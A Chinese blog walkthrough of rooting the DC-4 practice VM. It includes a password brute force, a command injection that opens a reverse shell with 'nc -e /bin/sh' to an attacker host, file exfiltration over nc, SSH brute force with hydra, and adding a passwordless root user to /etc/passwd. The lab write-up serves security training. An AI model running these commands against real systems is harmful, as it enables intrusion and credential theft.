日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 人文社科 > 生活经验 >内容正文

生活经验

DC4靶机渗透测试

發布時間:2023/11/28 生活经验 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 DC4靶机渗透测试 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

文章目錄

      • 環境版本:
      • 一、信息收集
        • 1.主機發現
        • 2.端口掃描
      • 二、漏洞挖掘
        • 1.訪問目標 ip,查看內容
        • 2.使用 BP 進行爆破密碼
        • 3.使用密碼登陸
        • 4.使用 BP 查看執行命令流量包
        • 5.替換命令來使用 nc 建立連接
        • 7.使用 nc 將靶機文件傳輸到攻擊機
        • 8.使用 hydra 爆破 ssh 密碼
        • 9.ssh 登陸,進行信息收集
        • 10.提權

描述:從靶機DC-3開始,只有一個入口和一個最終的flag,
只有拿到root權限才可以發現最終的flag,DC-4也是一樣

環境版本:

  • VMware pro 16
  • Kali 2021.1(虛擬機)
  • DC-4(虛擬機)
該實驗因個人原因,網絡更換若干次,請自行判斷 ip 屬于靶機還是攻擊機

一、信息收集

1.主機發現

arp-scan -l

發現靶機 ip

2.端口掃描

nmap -A -p- 192.168.43.35

發現其開啟了 22 端口,ssh 服務
80 端口,Nginx 服務

二、漏洞挖掘

1.訪問目標 ip,查看內容

發現是一個信息系統登入界面,提示用戶名為 admin

2.使用 BP 進行爆破密碼

1)準備密碼本,沒有可以使用 kali john工具的密碼本,位置:
/usr/share/john/password.lst cp /usr/share/john/password.lst ./1.txt #復制到桌面(在桌面打開的終端)

2)使用 BP 進行抓包

3)發送到 intruder,設置爆破點

4)加載密碼本

5)設置線程,我這設置的太大了,爆完之后502了…,重啟DC-4,嗚嗚嗚

6)查看爆破結果,得到密碼 happy

3.使用密碼登陸

發現有命令選項,進入后發現有命令列表,選中命令點擊 run 發現可以執行

4.使用 BP 查看執行命令流量包

發現明文命令,并使用 ‘+’ 替換空格

5.替換命令來使用 nc 建立連接

1)攻擊機監聽端口:

nc -lvvp 233

2)BP 改包連接 nc

radio=nc+KALIIP+233+-e+/bin/sh&submit=Run



使用 ls 測試,發現成功連接

6.收集信息

發現 home 目錄有三個用戶:charles、jim、sam
jim 目錄下有 backups 目錄,和 test.sh 文件,查看該文件

發現作者整活
查看 backups 目錄,發現密碼備份,結合上邊 ssh 服務,懷疑是 ssh 密碼,

7.使用 nc 將靶機文件傳輸到攻擊機

攻擊機監聽: nc -lp 1234 >old-passwords.bak   
靶機 shell 發送:(下方為攻擊機 ip) 
nc 192.168.1.131 1234 <./old-passwords.bak

8.使用 hydra 爆破 ssh 密碼

新建 users.txt 將三個用戶每行一個寫入保存

hydra -L users.txt -P old-passwords.bak 192.168.1.111 ssh -t 60 -o passwd.txt    #別忘更改 ip 為你的靶機 ip

得到 jim ssh 密碼

9.ssh 登陸,進行信息收集

ssh jim@192.168.1.111

1)發現郵件,查找郵件相關

得到 charles 賬戶密碼 ^xHhA&hvim0y

2)查看 jim 可執行 sudo 得命令

發現不行

3)使用 charles 賬戶登陸,查看 sudo 可執行命令

發現 teehee :-a 寫入文件內容,不覆蓋文件

10.提權

使用teehee創建空密碼賬號,并將其加入 root 組

echo "huang::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

總結

以上是生活随笔為你收集整理的DC4靶机渗透测试的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。